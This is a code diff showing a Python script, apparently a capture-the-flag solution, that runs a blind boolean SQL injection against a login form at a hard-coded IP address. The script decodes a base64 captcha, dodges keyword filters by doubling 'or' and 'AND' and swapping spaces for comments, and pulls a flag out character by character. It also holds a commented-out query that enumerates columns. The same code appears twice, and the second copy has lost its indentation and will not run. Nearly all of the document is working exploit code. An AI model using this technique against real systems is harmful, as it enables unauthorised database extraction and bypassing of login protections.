omakmoh · August 8, 2022 12:27 · zAbuQasem · Aug 8, 2022
diff --git a/kenzy.py b/kenzy.py
 import requests,re,base64
 s = requests.session()
 pat = r'(?<=\:").+?(?=\")'
 lipos = 0
 def sqli(pos,mid):
        cap = s.get('http://34.175.249.72:60001/scripts/captcha.php')
        response = cap.text
        notlatestcap = re.findall(pat, response)
        verylatestcap = base64.b64decode(notlatestcap[0]).decode("utf-8")
        veryverylatestcap = base64.b64decode(verylatestcap)
        code = veryverylatestcap.decode("utf-8")
        payload = f"admin' AND {mid}<ascii(substr((select flag from solve),{pos},1))#".replace('or','oorr').replace('AND','ANANDD').replace(' ','/**/')
 #       payload = f"admin' AND {mid}<ascii(substr((select concat(column_name) from information_schema.columns where table_schema=database() AND  table_name='users' limit {lipos},1),{pos},1))#".replace('or','oorr').replace('AND','ANANDD').replace(' ','/**/')
        #print(payload)
        payload = {"username":payload,"password":"asd","captcha":code,"send":"Send"}
        #print(payload)
        r = s.post('http://34.175.249.72:60001/index.php', data=payload)
        #print(r.text)
        return "Treasures are always" in r.text

 def get_char(pos):
    lo, hi = 32, 128
    while lo <= hi:
        mid = lo + (hi - lo) // 2
        if sqli(pos, mid):
            lo = mid + 1
        else:
            hi = mid - 1
    return chr(lo)

 flag = ''
 for i in range(1, 31):
    flag += get_char(i)
    print(flag)
	import requests,re,base64
	s = requests.session()
	pat = r'(?<=\:").+?(?=\")'
	lipos = 0
	def sqli(pos,mid):
	cap = s.get('http://34.175.249.72:60001/scripts/captcha.php')
	response = cap.text
	notlatestcap = re.findall(pat, response)
	verylatestcap = base64.b64decode(notlatestcap[0]).decode("utf-8")
	veryverylatestcap = base64.b64decode(verylatestcap)
	code = veryverylatestcap.decode("utf-8")
	payload = f"admin' AND {mid}<ascii(substr((select flag from solve),{pos},1))#".replace('or','oorr').replace('AND','ANANDD').replace(' ','/**/')
	# payload = f"admin' AND {mid}<ascii(substr((select concat(column_name) from information_schema.columns where table_schema=database() AND table_name='users' limit {lipos},1),{pos},1))#".replace('or','oorr').replace('AND','ANANDD').replace(' ','/**/')
	#print(payload)
	payload = {"username":payload,"password":"asd","captcha":code,"send":"Send"}
	#print(payload)
	r = s.post('http://34.175.249.72:60001/index.php', data=payload)
	#print(r.text)
	return "Treasures are always" in r.text

	def get_char(pos):
	lo, hi = 32, 128
	while lo <= hi:
	mid = lo + (hi - lo) // 2
	if sqli(pos, mid):
	lo = mid + 1
	else:
	hi = mid - 1
	return chr(lo)

	flag = ''
	for i in range(1, 31):
	flag += get_char(i)
	print(flag)